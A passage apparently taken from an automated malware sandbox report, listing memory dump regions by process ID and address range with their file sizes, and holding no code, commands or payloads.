                                                                                                                                        • memory/4296-48-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-651-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-112-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-1366-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-594-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-90-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-65-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-1082-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4296-94-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4436-117-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4436-118-0x0000000000BA0000-0x0000000001076000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4548-307-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          380KB

                                                                                                                                        • memory/4548-305-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          380KB

                                                                                                                                        • memory/4624-32-0x00000000003A0000-0x0000000000876000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4624-47-0x00000000003A0000-0x0000000000876000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4692-83-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-87-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-119-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-113-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-110-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-91-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-64-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-385-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-630-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4692-626-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB

                                                                                                                                        • memory/4876-1112-0x00000000008B0000-0x0000000000D86000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4876-1114-0x00000000008B0000-0x0000000000D86000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/4916-81-0x0000000000440000-0x00000000008D6000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.6MB

                                                                                                                                        • memory/4916-82-0x0000000000440000-0x00000000008D6000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.6MB

                                                                                                                                        • memory/5040-294-0x0000000000CC0000-0x0000000000D70000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          704KB

                                                                                                                                        • memory/5084-1565-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/5084-1575-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/5084-1527-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/5084-1526-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/5084-1574-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/5084-1588-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/5276-1205-0x0000000000400000-0x00000000008CA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/5276-1203-0x0000000000400000-0x00000000008CA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/5276-1573-0x0000000000400000-0x00000000008CA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/5276-1545-0x0000000000400000-0x00000000008CA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.8MB

                                                                                                                                        • memory/5448-1571-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          380KB

                                                                                                                                        • memory/5448-1572-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          380KB

                                                                                                                                        • memory/5484-4399-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                        • memory/5484-4402-0x0000000006540000-0x0000000006552000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          72KB

                                                                                                                                        • memory/5484-4387-0x0000000070230000-0x000000007027C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          304KB

                                                                                                                                        • memory/5484-4397-0x0000000007950000-0x000000000796E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          120KB

                                                                                                                                        • memory/5484-4398-0x0000000007970000-0x0000000007A13000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          652KB

                                                                                                                                        • memory/5484-4385-0x0000000006CB0000-0x0000000006CFC000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          304KB

                                                                                                                                        • memory/5484-4400-0x0000000007B20000-0x0000000007B31000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          68KB

                                                                                                                                        • memory/5484-4386-0x0000000007910000-0x0000000007942000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          200KB

                                                                                                                                        • memory/5484-4403-0x0000000006530000-0x000000000653A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                        • memory/5484-4384-0x0000000006190000-0x00000000064E4000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          3.3MB

                                                                                                                                        • memory/5676-4423-0x0000000006160000-0x00000000064B4000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          3.3MB

                                                                                                                                        • memory/5676-4433-0x0000000006890000-0x00000000068DC000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          304KB

                                                                                                                                        • memory/5676-4442-0x00000000075E0000-0x0000000007624000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          272KB

                                                                                                                                        • memory/5676-4443-0x0000000007990000-0x0000000007A06000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          472KB

                                                                                                                                        • memory/6040-1524-0x0000000000ED0000-0x0000000000F1C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          304KB

                                                                                                                                        • memory/6560-4439-0x0000000000400000-0x000000000084C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4.3MB